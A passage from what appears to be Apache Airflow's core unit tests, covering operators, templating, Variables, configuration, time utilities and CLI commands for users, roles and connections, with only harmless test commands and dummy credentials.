task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, _ = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'FERNET_KEY'): None}):
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, (str,))
run_id = 'trig__' + utc_now_str
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, str))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class CliTests(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
args = self.parser.parse_args([
'users', '-d', '--username', 'test3',
])
cli.users(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', '-c', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.users(self.parser.parse_args(['users', '-l']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id') # this key not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', '-i', f.name
])
cli.users(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', '-e', f.name
])
cli.users(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', '--add-role', '--username', 'test4', '--role', 'Op'
])
cli.users(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', '--remove-role', '--username', 'test4', '--role', 'Viewer'
])
cli.users(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', '--create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', '--create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles(args)
cli.roles(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.roles(self.parser.parse_args(['roles', '-l']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
def test_cli_list_jobs(self):
args = self.parser.parse_args(['list_jobs'])
cli.list_jobs(args)
def test_cli_list_jobs_with_args(self):
args = self.parser.parse_args(['list_jobs', '--dag_id',
'example_bash_operator',
'--state', 'success',
'--limit', '100'])
cli.list_jobs(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
        # Prepare to verify the connections added above
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
